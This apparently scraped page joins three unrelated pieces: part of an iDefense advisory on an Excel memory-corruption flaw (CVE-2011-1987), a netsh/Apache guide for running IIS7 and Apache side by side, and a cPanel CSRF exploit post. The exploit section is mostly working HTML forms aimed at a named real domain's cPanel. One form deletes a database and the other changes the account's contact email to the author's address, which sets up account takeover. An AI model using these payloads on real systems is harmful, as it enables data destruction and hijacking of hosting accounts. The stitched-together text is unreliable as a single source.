It is possible to pass negative 16-bit values, which are later sign extended to 32 bits. The sign extended value is later used as an index into a heap-based array. Due to the incomplete validation of the ‘iax’ field, it is possible to index outside of the bounds of the array, which can lead to a controlled overwrite of arbitrary memory locations with user data. This can lead to the execution of arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user opening the file. To exploit this vulnerability, an attacker needs to convince a user to open a malicious file. Attackers typically accomplish this by e-mailing a targeted user the file or hosting the file on a Web page.

IV. DETECTION

Microsoft has reported the following products vulnerable:

    * Microsoft Excel 2003 SP 3
    * Microsoft Excel 2007 SP 2
    * Microsoft Office 2007 SP 2
    * Microsoft Excel 2010 (32-bit editions)
    * Microsoft Excel 2010 SP 1 (32-bit editions)
    * Microsoft Office 2010 and Microsoft Office 2010 SP 1 (32-bit editions)
    * Microsoft Excel 2010 (64-bit editions)
    * Microsoft Excel 2010 SP 1 (64-bit editions)
    * Microsoft Office 2010 and Microsoft Office 2010 SP 1 (64-bit editions)
    * Microsoft Office 2004 for Mac
    * Microsoft Office 2008 for Mac
    * Microsoft Office for Mac 2011
    * Open XML File Format Converter for Mac
    * Microsoft Excel Viewer SP 2
    * Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP 2
    * Excel Services
    * Microsoft Excel Web App 2010 and Microsoft Excel Web App 2010 SP 1
V. WORKAROUND

Microsoft suggested workarounds can be found under the Workaround section within Microsoft Security Bulletin MS11-072.

http://technet.microsoft.com/en-us/security/bulletin/ms11-072

VI. VENDOR RESPONSE

Microsoft has released fixes which addresses this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown.

http://technet.microsoft.com/en-us/security/bulletin/ms11-072

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2011-1987 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

02/25/2011 Initial Vendor Notification

02/25/2011 Vendor Reply

09/13/2011 Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Sean Larsson, iDefense Labs.

Get paid for vulnerability research

http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events

http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2011 Verisign

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customer service for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.


1) Add, or make sure your machine already has, two or more IP addresses
2) Open a command prompt
3) Type netsh
4) Type http
5) Type sho iplisten. It should be blank
6) Type add iplisten ipaddress=192.168.0.90
You should get IP address successfully added
7) Type sho iplisten again
It should sho 192.168.0.90 in the list
8) Type exit to get out of netsh
9) Type netstat -an. See if you notice 192.168.0.90:80 in the list. If you see 0.0.0.0:80, do an iisreset
10) Download and install Apache ( I did it with 2.2.4)
http://mirror.nyi.net/apache/httpd/binaries/win32/apache_2.2.4-win32-x86…
11) Do a default install,
12) Open httpd.conf and adjust the ip listen to 192.168.0.91:80

# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, instead of the default. See also the
# directive.
#
# Change this to Listen on specific IP addresses as shown below to
# prevent Apache from glomming onto all bound IP addresses (0.0.0.0)
#
#Listen 12.34.56.78:80
#Was 80
#Change to

Listen 192.168.0.91:80

12) Restart the Apache service. (For some reason the start/stop control didn't work for me; I used `net stop apache2` followed by `net start apache2`.)
13) Type netstat -an
14) You should see both 192.168.0.90:80 and 192.168.0.91:80. Open a browser and test both IPs to confirm that IIS7 and Apache each come up.
15) Test restarting Apache service to see if it works after that.
16) Turn off Apache and browse IIS; turn off IIS and browse Apache. Test every combination to confirm it works.

Sep 14

Test Code:

[+] Info=======================================================

[-] Exploit Title: cPanel < 11.30.2 Multiple CSRF Vulnerabilities
[-] Author: Net.Edit0r
[-] Home : Black-HG.Org ~ h4ckcity.org
[-] Version: 11.30.2
[-] Software Link: http://cpanel.net
[-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net
[-] Date : 27/08/2011
[-] CVE : N/A
[-] Video Demo : http://www.black-hg.org/Vedioz/cpanel.rar
[-] Tnx2 : A.Cr0x & 3H34N & 4m!n & Cyrus & tHe.k!ll3r & Mr.XHat & Mikili

[+] Exploit=====================================================

[-]  Introduction :

cPanel versions below (and excluding) 11.30.2 are vulnerable to CSRF, which
lets an attacker change the account's contact email address to one of their
choosing. If you have turned off security tokens and the referrer security
check, you are vulnerable regardless of the version you are running.

Note: You can use this vulnerability to do intelligent

[-]  Remote Delete Database

<!-- CSRF proof of concept: a cross-site page holding a POST form aimed at the
     cPanel x3 "sql/deldb.html" endpoint, carrying the database name in the
     "db" field; the onload handler is intended to submit it without user
     interaction. The /cpsess.../ path segment appears to be cPanel's
     per-session security token, and the advisory text above states the
     attack only works where security tokens and the referrer check have
     been disabled. Mitigation: keep both protections enabled and run
     11.30.2 or later. -->
<html>
<head>
<body>
<title>Coded By #BHG</title>
<form method="post"
action=https://www.downloadpars.ir:2083/cpsess1461226313/frontend/x3/sql
/deldb.html

name="mainform" id="mainform">
        <h4>Delete Database</h4>
        <div class="highlight">
        <table cellpadding="3" cellspacing="0">
    <tr>
        <td><label for="dbname">Victim Database:</label></td>
        <td><input type="text" name="db" id="dbname" style="width: 150px" /></td>
        </tr>
    <td> </td>
                <td><center><input type="submit" id="submit_dbname"
value="Delete Database" class="input-button" /></center></td>
                <body onload="document.forms.g.submit();">
    <td></td>
        </tr>
        </table>
        </div>
    </form>
</div>
</body>
</html>

[-]  Remote Change Cpanel Mail

<!-- CSRF proof of concept: a cross-site form aimed at the cPanel x3
     "contact/saveemail.html" endpoint. Submitting it would set the
     account's contact address ("email") and secondary address
     ("second_email") together with the three notification flags, which is
     the "change email address" impact described in the advisory above.
     As with the first form, the hard-coded /cpsess.../ path segment appears
     to be cPanel's per-session security token, so the attack depends on
     security tokens and the referrer check being disabled. Mitigation:
     keep both protections enabled and run 11.30.2 or later. -->
<html>
<head>
<body>
<title>Coded By #BHG</title>
<form id="mainform" name="mainform"
action=https://www.downloadpars.ir:2083/cpsess8033607818/frontend/x3/contact/
saveemail.html?email=
>
<ul class="contact_form">

        <li class="contact_label">Chenge New Email Address</li>
        <li class="contact_input brd"><input id="email" name="email"
type="text" checked="checked" value="net.edit0r@gmail.com" size="40"
/></li>
        <li class="contact_label">The second address to receive
notifications</li>
        <li class="contact_input brd"><input id="second_email"
name="second_email" type="text" checked="checked" value="" size="40"
/></li>

        <li><strong>Contact Preferences</strong></li>

        <li class="contact_input"><input id="notify_disk_limit"
name="notify_disk_limit" type="checkbox" checked="checked" value="1"
size="40" />Send notifications to your contact email address when you
are reaching your disk quota.</li>
   
        <li class="contact_input"><input id="notify_bandwidth_limit"
name="notify_bandwidth_limit" type="checkbox" checked="checked"
value="1" size="40" />Send notifications to your contact email address
when you are reaching your bandwidth usage limit.</li>
   
        <li class="contact_input"><input id="notify_email_quota_limit"
name="notify_email_quota_limit" type="checkbox" checked="checked"
value="1" size="40" />Send notifications to your contact email address
when one of your email accounts approaches or is over quota.</li>

    <input style="margin-top:10px" type="submit" id="submit-button"
class="input-button" value="Save"></div></li>

</ul>
<br />

</form>
</div>
</body>
</html>
